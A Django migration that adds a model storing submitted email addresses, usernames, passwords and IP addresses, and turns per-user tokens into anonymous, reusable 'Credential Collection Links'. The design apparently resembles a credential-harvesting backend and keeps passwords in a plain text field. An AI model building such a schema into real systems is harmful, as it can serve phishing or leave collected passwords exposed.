# Generated by Django 4.2.7 on 2025-11-15 15:43

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('credentials', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='CredentialSubmission',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254)),
                ('username', models.CharField(max_length=150)),
                ('password', models.CharField(max_length=128)),
                ('submitted_at', models.DateTimeField(auto_now_add=True)),
                ('ip_address', models.GenericIPAddressField(blank=True, null=True)),
                ('reviewed', models.BooleanField(default=False)),
                ('notes', models.TextField(blank=True)),
            ],
            options={
                'verbose_name': 'Credential Submission',
                'verbose_name_plural': 'Credential Submissions',
                'ordering': ['-submitted_at'],
            },
        ),
        migrations.AlterModelOptions(
            name='credentialupdatetoken',
            options={'ordering': ['-created_at'], 'verbose_name': 'Credential Collection Link', 'verbose_name_plural': 'Credential Collection Links'},
        ),
        migrations.RemoveField(
            model_name='credentialupdatetoken',
            name='is_used',
        ),
        migrations.RemoveField(
            model_name='credentialupdatetoken',
            name='used_at',
        ),
        migrations.RemoveField(
            model_name='credentialupdatetoken',
            name='user',
        ),
        migrations.AddField(
            model_name='credentialupdatetoken',
            name='description',
            field=models.CharField(blank=True, help_text='Optional description for this link', max_length=255),
        ),
    ]
